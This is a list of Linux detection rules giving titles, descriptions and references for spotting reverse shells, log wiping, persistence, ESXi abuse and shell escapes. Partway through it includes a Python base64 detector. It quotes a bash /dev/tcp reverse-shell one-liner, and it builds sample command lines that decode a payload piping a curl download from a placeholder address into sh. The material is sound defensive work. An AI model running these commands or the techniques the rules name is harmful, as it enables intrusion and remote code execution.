Buffer Overflow Attempts |
Detects buffer overflow attempts in Unix system log files |
https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml |
Commands to Clear or Remove the Syslog - Builtin |
Detects specific commands commonly used to remove or empty the syslog |
https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474 |
Remote File Copy |
Detects the use of tools that copy files from or to remote systems |
https://attack.mitre.org/techniques/T1105/ |
Code Injection by ld.so Preload |
Detects the ld.so preload persistence file. See `man ld.so` for more information. |
https://man7.org/linux/man-pages/man8/ld.so.8.html |
Nimbuspwn Exploitation |
Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800) |
https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/, https://github.com/Immersive-Labs-Sec/nimbuspwn |
Potential Suspicious BPF Activity - Linux |
Detects the presence of warning messages generated by the "bpf_probe_write_user" BPF helper, which could be a sign of suspicious eBPF activity on the system. |
https://redcanary.com/blog/ebpf-malware/, https://man7.org/linux/man-pages/man7/bpf-helpers.7.html |
Shellshock Expression |
Detects shellshock expressions in log files |
https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf |
Privileged User Has Been Created |
Detects the addition of a new user to a privileged group such as "root" or "sudo" |
https://digital.nhs.uk/cyber-alerts/2018/cc-2825, https://linux.die.net/man/8/useradd, https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid |
Linux Command History Tampering |
Detects commands that try to clear or tamper with the Linux command history.
This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md, https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics, https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/ |
Suspicious Activity in Shell Commands |
Detects suspicious shell commands used in various exploit codes (see references) |
https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html, https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb, http://pastebin.com/FtygZ1cg, https://artkond.com/2017/03/23/pivoting-guide/ |
Suspicious Log Entries |
Detects suspicious log entries in Linux log files |
https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml |
Suspicious Reverse Shell Command Line |
Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell |
https://alamot.github.io/reverse_shells/ |
Space After Filename |
Detects a space after a filename |
https://attack.mitre.org/techniques/T1064 |
Suspicious Use of /dev/tcp |
Detects suspicious commands using /dev/tcp |
https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/, https://book.hacktricks.xyz/shells/shells/linux, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan |
JexBoss Command Sequence |
Detects a suspicious command sequence used by JexBoss |
https://www.us-cert.gov/ncas/analysis-reports/AR18-312A |
Symlink Etc Passwd |
Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd |
https://www.qualys.com/2021/05/04/21nails/21nails.txt |
PwnKit Local Privilege Escalation |
Detects potential PwnKit exploitation CVE-2021-4034 in auth logs |
https://twitter.com/wdormann/status/1486161836961579020 |
Relevant ClamAV Message |
Detects relevant ClamAV messages |
https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml |
Modifying Crontab |
Detects suspicious modification of crontab file. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md |
Guacamole Two Users Sharing Session Anomaly |
Detects a suspicious session with two users present |
https://research.checkpoint.com/2020/apache-guacamole-rce/ |
SSHD Error Message CVE-2018-15473 |
Detects exploitation attempt using public exploit code for CVE-2018-15473 |
https://github.com/Rhynorater/CVE-2018-15473-Exploit |
Suspicious OpenSSH Daemon Error |
Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts |
https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c, https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml |
Sudo Privilege Escalation CVE-2019-14287 - Builtin |
Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287 |
https://www.openwall.com/lists/oss-security/2019/10/14/1, https://access.redhat.com/security/cve/cve-2019-14287, https://twitter.com/matthieugarin/status/1183970598210412546 |
Disabling Security Tools - Builtin |
Detects disabling security tools |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md |
Persistence Via Sudoers Files |
Detects creation of a sudoers file or of files in the "sudoers.d" directory, which can be used as a method to persist privileges for a specific user. |
https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh |
Suspicious Named Error |
Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts |
https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml |
Suspicious VSFTPD Error Messages |
Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts |
https://github.com/dagwieers/vsftpd/ |
Potentially Suspicious Shell Script Creation in Profile Folder |
Detects the creation of shell scripts under the "profile.d" path. |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Triple Cross eBPF Rootkit Default LockFile |
Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running. |
https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33 |
Persistence Via Cron Files |
Detects creation of a cron file or of files in cron directories, which could indicate potential persistence. |
https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml |
Linux Reverse Shell Indicator |
Detects a bash process connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') |
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md |
Wget Creating Files in Tmp Directory |
Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp" |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Triple Cross eBPF Rootkit Default Persistence |
Detects the creation of "ebpfbackdoor" files in both the "cron.d" and "sudoers.d" directories, both of which are related to the TripleCross persistence method |
https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh |
Linux Doas Conf File Creation |
Detects the creation of a doas.conf file on a Linux host. |
https://research.splunk.com/endpoint/linux_doas_conf_file_creation/, https://www.makeuseof.com/how-to-install-and-use-doas/ |
Communication To Ngrok Tunneling Service - Linux |
Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden data exfiltration by malicious actors |
https://twitter.com/hakluke/status/1587733971814977537/photo/1, https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent |
Communication To LocaltoNet Tunneling Service Initiated - Linux |
Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains.
LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.
Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
|
https://localtonet.com/documents/supported-tunnels, https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications |
Linux Crypto Mining Pool Connections |
Detects process connections to a Monero crypto mining pool |
https://www.poolwatch.io/coin/monero |
Potentially Suspicious Malware Callback Communication - Linux |
Detects programs that connect to known malware callback ports based on threat intelligence reports.
|
https://www.mandiant.com/resources/blog/triton-actor-ttp-profile-custom-attack-tools-detections, https://www.mandiant.com/resources/blog/ukraine-and-sandworm-team, https://www.elastic.co/guide/en/security/current/potential-non-standard-port-ssh-connection.html, https://thehackernews.com/2024/01/systembc-malwares-c2-server-analysis.html, https://www.cybereason.com/blog/sliver-c2-leveraged-by-many-threat-actors |
Shell Invocation via Apt - Linux |
Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands.
Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
|
https://gtfobins.github.io/gtfobins/apt/, https://gtfobins.github.io/gtfobins/apt-get/ |
Scheduled Task/Job At |
Detects the use of at/atd which are utilities that are used to schedule tasks.
They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md |
Suspicious Invocation of Shell via AWK - Linux |
Detects the execution of "awk" or its sibling commands (gawk, nawk, mawk) to invoke a shell using the system() function.
This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.
|
https://gtfobins.github.io/gtfobins/awk/#shell, https://gtfobins.github.io/gtfobins/gawk/#shell, https://gtfobins.github.io/gtfobins/nawk/#shell, https://gtfobins.github.io/gtfobins/mawk/#shell |
Decode Base64 Encoded Text |
Detects usage of base64 utility to decode arbitrary base64-encoded text |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md |
Linux Base64 Encoded Pipe to Shell |
Detects suspicious process command line that uses base64 encoded input for execution with a shell |
https://github.com/arget13/DDexec, https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
Bash Interactive Shell |
Detects execution of the bash shell with the interactive flag "-i". |
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/, https://linux.die.net/man/1/bash |
BPFtrace Unsafe Option Usage |
Detects the usage of the unsafe bpftrace option |
https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/, https://bpftrace.org/ |
Enable BPF Kprobes Tracing |
Detects common command used to enable bpf kprobes tracing |
https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/, https://bpftrace.org/, https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html |
Capabilities Discovery - Linux |
Detects usage of the "getcap" binary. This is often used during recon activity to find binaries with file capabilities that can be abused, for example as GTFOBins. |
https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes, https://github.com/carlospolop/PEASS-ng, https://github.com/diego-treitos/linux-smart-enumeration |
Capsh Shell Invocation - Linux |
Detects the use of the "capsh" utility to invoke a shell.
|
https://gtfobins.github.io/gtfobins/capsh/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html |
Remove Immutable File Attribute |
Detects usage of the 'chattr' utility to remove immutable file attribute. |
https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html |
Linux Base64 Encoded Shebang In CLI |
Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded |
https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html, https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS |
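The two base64 rules above ("Linux Base64 Encoded Pipe to Shell" and "Linux Base64 Encoded Shebang In CLI") share one practical subtlety: base64 encodes input in 3-byte groups, so the same shebang bytes produce a different string depending on whether they start at offset 0, 1 or 2 of a group. A detector that only knows the offset-0 form ("IyEvYmluL...") misses a payload with a leading newline or space. The example below is added here as an illustration and is not part of the original rule set: it derives the three alignment-stable substrings for a shebang, applies both checks to constructed command lines (the payload and the 198.51.100.7 address are made up), and recovers the decoded payload for the analyst.

```python
import base64
import re


def b64_variants(needle):
    """Return the substrings of base64(needle) that are stable for each of the
    three 3-byte alignments, independent of the bytes surrounding needle."""
    variants = []
    for pad in range(3):
        raw = b"\x00" * pad + needle          # pad bytes stand in for unknown prefix bytes
        enc = base64.b64encode(raw).decode().rstrip("=")
        n = len(raw)
        keep = 4 * (n // 3) + n % 3           # chars that depend only on complete needle bytes
        lead = (0, 2, 3)[pad]                 # leading chars that (partly) encode the pad bytes
        variants.append(enc[:keep][lead:])
    return variants


# All alignments of the two shebang prefixes we care about.
SHEBANG_PATTERNS = [v for s in (b"#!/bin/", b"#!/usr/bin/") for v in b64_variants(s)]

B64_DECODE = re.compile(r"\bbase64\b[^|;&]*(?:-d\b|--decode\b)")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/|/usr/bin/)?(?:ba|z|da)?sh\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def scan_cmdline(cmdline):
    """Apply both base64 checks to one process command line."""
    hits = {"encoded_shebang": None, "base64_pipe_to_shell": False, "decoded": None}
    for pat in SHEBANG_PATTERNS:
        if pat in cmdline:
            hits["encoded_shebang"] = pat
            break
    if B64_DECODE.search(cmdline) and PIPE_TO_SHELL.search(cmdline):
        hits["base64_pipe_to_shell"] = True
    if hits["encoded_shebang"] or hits["base64_pipe_to_shell"]:
        # Hand the analyst the plaintext: take the longest base64-looking token.
        tokens = B64_TOKEN.findall(cmdline)
        if tokens:
            blob = max(tokens, key=len)
            try:
                raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
                hits["decoded"] = raw.decode("utf-8", "replace")
            except ValueError:
                hits["decoded"] = None
    return hits


# Constructed sample command lines (not taken from the referenced reports).
PAYLOAD = b"#!/bin/bash\ncurl -s http://198.51.100.7/x | sh\n"
SAMPLES = {
    # shebang at offset 0: the well-known "IyEvYmluL..." form
    "offset0": "echo " + base64.b64encode(PAYLOAD).decode() + " | base64 -d | bash",
    # a single leading newline shifts the shebang to offset 1
    "offset1": "echo " + base64.b64encode(b"\n" + PAYLOAD).decode() + " | base64 --decode | sh",
    # two leading bytes shift it to offset 2; decoded to a file, no pipe to a shell
    "offset2": 'sh -c "echo ' + base64.b64encode(b"  " + PAYLOAD).decode() + ' | base64 -d > /tmp/x"',
    "benign": "echo aGVsbG8gd29ybGQ= | base64 -d",   # "hello world", no shell involved
    "benign2": "cat /etc/os-release",
}

if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        print(name, scan_cmdline(cmd))
```

Only offset0 trips the pipe-to-shell check; offset1 and offset2 are caught solely by the alignment variants, which is the gap a single-string rule leaves open.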
Clipboard Collection with Xclip Tool |
Detects attempts to collect data stored in the clipboard of users using the xclip tool. xclip has to be installed.
Deploying this rule on servers is recommended, because clipboard utilities are heavily used on user workstations.
|
https://www.packetlabs.net/posts/clipboard-data-security/ |
Clear Linux Logs |
Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md |
Cat Sudoers |
Detects the execution of a cat /etc/sudoers to list all users that have sudo rights |
https://github.com/sleventyeleven/linuxprivchecker/ |
Commands to Clear or Remove the Syslog |
Detects specific commands commonly used to remove or empty the syslog, which attackers often use to hide their tracks |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md |
Crontab Enumeration |
Detects usage of crontab to list the tasks of the user |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Copy Passwd Or Shadow From TMP Path |
Detects when the "passwd" or "shadow" file is copied from a tmp path |
https://blogs.blackberry.com/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 |
Remove Scheduled Cron Task/Job |
Detects usage of the 'crontab' utility to remove the current crontab.
This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible
|
https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html |
Linux Crypto Mining Indicators |
Detects command line parameters or strings often used by crypto miners |
https://www.poolwatch.io/coin/monero |
Curl Usage on Linux |
Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server |
https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html |
Atlassian Confluence CVE-2022-26134 |
Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134 |
https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ |
Apache Spark Shell Command Injection - ProcessCreation |
Detects attempts to exploit an Apache Spark server via CVE-2022-33891 from a command line perspective |
https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py, https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html, https://github.com/apache/spark/pull/36315/files |
DD File Overwrite |
Detects potential overwriting and deletion of a file using DD. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd |
Potential Linux Process Code Injection Via DD Utility |
Detects the injection of code by overwriting the memory map of a Linux process using the "dd" Linux command. |
https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/, https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh |
Ufw Force Stop Using Ufw-Init |
Detects attempts to force stop the ufw using ufw-init |
https://blogs.blackberry.com/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 |
Linux Doas Tool Execution |
Detects execution of the doas tool on a Linux host. This utility allows standard users to perform tasks as root, the same way sudo does. |
https://research.splunk.com/endpoint/linux_doas_tool_execution/, https://www.makeuseof.com/how-to-install-and-use-doas/ |
Shell Invocation via Env Command - Linux |
Detects the use of the env command to invoke a shell. This may indicate an attempt to bypass restricted environments, escalate privileges, or execute arbitrary commands.
|
https://gtfobins.github.io/gtfobins/env/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html |
ESXi Network Configuration Discovery Via ESXCLI |
Detects execution of the "esxcli" command with the "network" flag in order to retrieve information about the network configuration. |
https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_network.html |
ESXi Admin Permission Assigned To Account Via ESXCLI |
Detects execution of the "esxcli" command with the "system" and "permission" flags in order to assign admin permissions to an account. |
https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html |
ESXi Storage Information Discovery Via ESXCLI |
Detects execution of the "esxcli" command with the "storage" flag in order to retrieve information about the storage status and other related information. Seen used by malware such as DarkSide and LockBit. |
https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html, https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_storage.html |
ESXi Syslog Configuration Change Via ESXCLI |
Detects changes to the ESXi syslog configuration via "esxcli" |
https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html |
ESXi System Information Discovery Via ESXCLI |
Detects execution of the "esxcli" command with the "system" flag in order to retrieve information about the different components of the system, such as accounts, modules, NTP, etc. |
https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html |
ESXi Account Creation Via ESXCLI |
Detects user account creation on ESXi system via esxcli |
https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html |
ESXi VM List Discovery Via ESXCLI |
Detects execution of the "esxcli" command with the "vm" flag in order to retrieve information about the installed VMs. |
https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html, https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/, https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html |
ESXi VM Kill Via ESXCLI |
Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM. |
https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vm.html, https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/, https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html |
ESXi VSAN Information Discovery Via ESXCLI |
Detects execution of the "esxcli" command with the "vsan" flag in order to retrieve information about virtual storage. Seen used by malware such as DarkSide. |
https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html, https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html, https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_vsan.html |
File and Directory Discovery - Linux |
Detects usage of system utilities such as "find", "tree", "findmnt", etc, to discover files, directories and network shares.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md |
File Deletion |
Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md |
Shell Execution via Find - Linux |
Detects the use of the find command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or exploitation attempt.
|
https://gtfobins.github.io/gtfobins/find/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html |
Shell Execution via Flock - Linux |
Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
|
https://gtfobins.github.io/gtfobins/flock/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html |
Shell Execution GCC - Linux |
Detects the use of the "gcc" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
|
https://gtfobins.github.io/gtfobins/gcc/#shell, https://gtfobins.github.io/gtfobins/c89/#shell, https://gtfobins.github.io/gtfobins/c99/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html |
Shell Execution via Git - Linux |
Detects the use of the "git" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
|
https://gtfobins.github.io/gtfobins/git/#shell |
OS Architecture Discovery Via Grep |
Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of "uname" or "cat /proc/cpuinfo"
|
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Group Has Been Deleted Via Groupdel |
Detects execution of the "groupdel" binary, which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks |
https://linuxize.com/post/how-to-delete-group-in-linux/, https://www.cyberciti.biz/faq/linux-remove-user-command/, https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/, https://linux.die.net/man/8/groupdel |
Install Root Certificate |
Detects installation of new certificate on the system which attackers may use to avoid warnings when connecting to controlled web servers or C2s |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md |
Suspicious Package Installed - Linux |
Detects installation of suspicious packages using system installation utilities |
https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt |
Flush Iptables Ufw Chain |
Detects use of iptables to flush all firewall rules, tables and chains, allowing all network traffic |
https://blogs.blackberry.com/, https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 |
Local System Accounts Discovery - Linux |
Detects enumeration of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md, https://my.f5.com/manage/s/article/K589, https://man.freebsd.org/cgi/man.cgi?pwd_mkdb |
Local Groups Discovery - Linux |
Detects enumeration of local system groups. Adversaries may attempt to find local system groups and permission settings |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md |
Potential GobRAT File Discovery Via Grep |
Detects the use of grep to discover specific files created by the GobRAT malware |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
Named Pipe Created Via Mkfifo |
Detects the creation of a new named pipe using the "mkfifo" utility |
https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk, https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
Potentially Suspicious Named Pipe Created Via Mkfifo |
Detects the creation of a new named pipe using the "mkfifo" utility in a potentially suspicious location |
https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk, https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally |
Mount Execution With Hidepid Parameter |
Detects execution of the "mount" command with the "hidepid" parameter, which hides processes from other users on the system |
https://blogs.blackberry.com/, https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/, https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 |
Potential Netcat Reverse Shell Execution |
Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup. |
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/, https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/, https://www.infosecademy.com/netcat-reverse-shells/, https://man7.org/linux/man-pages/man1/ncat.1.html |
Shell Execution via Nice - Linux |
Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.
|
https://gtfobins.github.io/gtfobins/nice/#shell, https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html |
Nohup Execution |
Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments |
https://gtfobins.github.io/gtfobins/nohup/, https://en.wikipedia.org/wiki/Nohup, https://www.computerhope.com/unix/unohup.htm |
Suspicious Nohup Execution |
Detects execution of binaries located in potentially suspicious locations via "nohup" |
https://blogs.jpcert.or.jp/en/2023/05/gobrat.html, https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/, https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection, https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection |
OMIGOD SCX RunAsProvider ExecuteScript |
Rule to detect the use of the SCX RunAsProvider ExecuteScript to execute any UNIX/Linux script using the /bin/sh shell.
Script being executed gets created as a temp file in /tmp folder with a scx* prefix.
Then it is invoked from the following directory /etc/opt/microsoft/scx/conf/tmpdir/.
